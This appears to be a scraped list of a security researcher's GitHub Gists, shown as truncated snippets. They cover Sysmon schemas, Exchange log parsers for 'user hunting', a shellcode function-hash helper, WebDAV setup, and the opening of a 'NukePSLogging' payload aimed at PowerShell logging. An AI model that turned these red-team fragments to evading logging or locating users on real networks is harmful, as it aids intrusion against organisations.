Lee Chagolla-Christensen leechristensen
Pulled it using strings.exe..... :)
<!DOCTYPE Sysmon [<!ELEMENT Sysmon (EventFiltering|HashAlgorithms)*>
<!ATTLIST Sysmon schemaversion CDATA #REQUIRED>
<!ELEMENT EventFiltering (ProcessCreate|FileCreateTime|NetworkConnect|ProcessTerminate|DriverLoad|ImageLoad|CreateRemoteThread)*>
<!ELEMENT ProcessCreate (SequenceNumber|UtcTime|ProcessGuid|ProcessId|Image|CommandLine|CurrentDirectory|User|LogonGuid|LogonId|TerminalSessionId|IntegrityLevel|Hashes|ParentProcessGuid|ParentProcessId|ParentImage|ParentCommandLine)*>
<!ATTLIST ProcessCreate onmatch (include|exclude) #IMPLIED>
<!ATTLIST ProcessCreate default (include|exclude) #IMPLIED>
<!ELEMENT SequenceNumber (#PCDATA)*>
<!ATTLIST SequenceNumber condition CDATA "is">
@leechristensen
leechristensen / ParseRPCClientAccessLogs.ps1
Created January 27, 2016 17:38
Parses Exchange's RPC Client Access Logs to get client usernames/IP addresses.
# Author: Lee Christensen (@tifkin_)
#$RPClientLogDir = "$($env:exchangeinstallpath)\Logging\RPC Client Access\"
$RPClientLogDir = "."
$NumberOfLogs = 100
$RecentLogs = ls "$RPClientLogDir\*.log" | sort LastWriteTime -Descending | select -First $NumberOfLogs -ExpandProperty FullName
$UserLogons = @()
foreach($Log in $RecentLogs)
{
@leechristensen
leechristensen / ParseEwsExchangeLogs.ps1
Created January 27, 2016 18:09
Extracts the email and client IP address from Exchange's EWS logs. Useful for user hunting.
# Default Exchange EWS log location; overridden below to read logs from the current directory
#$EWSLogPath = "$($env:exchangeinstallpath)\Logging\EWS\"
$EWSLogPath = "."
$NumberOfLogs = 10
$RecentLogs = ls "$EWSLogPath\*.log" | sort LastWriteTime -Descending | select -First $NumberOfLogs -ExpandProperty FullName
$UserLogons = @()
foreach($Log in $RecentLogs)
{
    $LogFile = Get-Content $Log | select -Skip 5
@leechristensen
leechristensen / Sysmon4.0XmlConfigSchema.xml
Created April 28, 2016 23:05
Sysmon v4.0 XML Configuration Schema
<!DOCTYPE Sysmon [<!ELEMENT Sysmon (EventFiltering|HashAlgorithms)*>
<!ATTLIST Sysmon schemaversion CDATA #REQUIRED>
<!ELEMENT EventFiltering (ProcessCreate|FileCreateTime|NetworkConnect|ProcessTerminate|DriverLoad|ImageLoad|CreateRemoteThread|RawAccessRead)*>
<!ELEMENT ProcessCreate (UtcTime|ProcessGuid|ProcessId|Image|CommandLine|CurrentDirectory|User|LogonGuid|LogonId|TerminalSessionId|IntegrityLevel|Hashes|ParentProcessGuid|ParentProcessId|ParentImage|ParentCommandLine)*>
<!ATTLIST ProcessCreate onmatch (include|exclude) #IMPLIED>
<!ATTLIST ProcessCreate default (include|exclude) #IMPLIED>
<!ELEMENT UtcTime (#PCDATA)*>
<!ATTLIST UtcTime condition CDATA "is">
<!ELEMENT ProcessGuid (#PCDATA)*>
<!ATTLIST ProcessGuid condition CDATA "is">
PS C:\> $Command = 'powershell.exe -E "
@leechristensen
leechristensen / PrintFunctionHashes.c
Last active June 19, 2020 13:35
Calculates function hashes for use in Matt Graeber's C to Shellcode project
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
// Calculates function hashes for use in Matt Graeber's C to Shellcode project
// See http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html
//
// Usage: PrintFunctionHashes.exe user32.dll | findstr /i messagebox
// This compiles to a ROR instruction

1) Enable WebDAV

sudo a2enmod dav
sudo a2enmod dav_fs

mkdir -p /var/www/webdav
touch /var/www/DavLock
chown www-data:www-data /var/www/webdav /var/www/DavLock

2) vim /etc/apache2/sites-available/000-default.conf

@leechristensen
leechristensen / PInvokedMethodsV2.txt
Created January 21, 2017 01:08
PowerShell 2.0 PInvoke'd Methods
Name Dll DeclaringType
---- --- -------------
GetCurrentThreadId kernel32.dll System.AppDomain
VarCyFromDec oleaut32.dll System.StubHelpers.StubHelpers
VarDecFromCy oleaut32.dll System.StubHelpers.StubHelpers
CreateActContext mscorwks.dll System.Deployment.Internal.Isolation.IsolationInterop
CreateCMSFromXml mscorwks.dll System.Deployment.Internal.Isolation.IsolationInterop
ParseManifest mscorwks.dll System.Deployment.Internal.Isolation.IsolationInterop
GetUserStore mscorwks.dll System.Deployment.Internal.Isolation.IsolationInterop
@leechristensen
leechristensen / NukePSLogging.cpp
Created March 17, 2017 09:20
Nuke PS Logging
void Payload() {
    DWORD threadId;
    CreateThread(
        NULL,             // default security attributes
        0,                // use default stack size
        MyThreadFunction, // thread function name
        NULL,             // argument to thread function
        0,                // use default creation flags
        &threadId);
}

Keybase proof

I hereby claim:

  • I am leechristensen on github.
  • I am tifkin (https://keybase.io/tifkin) on keybase.
  • I have a public key whose fingerprint is 91F2 D977 5912 0E51 AD40 0C64 2217 7C8E 7D5A 102D

To claim this, I am signing this object: